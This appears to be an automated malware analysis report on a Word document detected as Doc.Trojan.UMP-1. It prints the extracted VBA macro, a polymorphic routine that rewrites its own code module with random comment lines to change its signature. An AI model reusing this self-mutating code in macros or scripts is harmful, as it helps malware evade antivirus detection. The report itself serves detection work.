MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with a critical heuristic firing. It contains VBA macros, as evidenced by the 'OLE_VBA_MACROS' heuristic and the 'macros.bas' script. The VBA script appears to be a polymorphic obfuscation routine, likely intended to hide or modify a malicious payload. The specific payload or its execution method is not directly discernible from the provided script, leading to a slightly reduced confidence in family attribution.
Heuristics 2
-
ClamAV: Doc.Trojan.UMP-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.UMP-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 747 bytes |
SHA-256: 389f769689ca647f6b5ba288463149c4d273d03595ca13e00e5ef4befaea3890 |
|||
|
Detection
ClamAV:
Doc.Trojan.UMP-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UMP"
Sub UMP()
'-=[ULTRAS MACRO POLYMORHIC]=-
PoNu = Int(Rnd() * 33 + 1)
For Mutate = 1 To PoNu
PoRL = Application.VBE.ActiveVBProject.VBComponents("UMP").CodeModule.CountOfLines
PoLi = Int(Rnd() * PoRL + 1)
a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("UMP").CodeModule.InsertLines PoLi, vbTab & "' " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e
Next Mutate
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.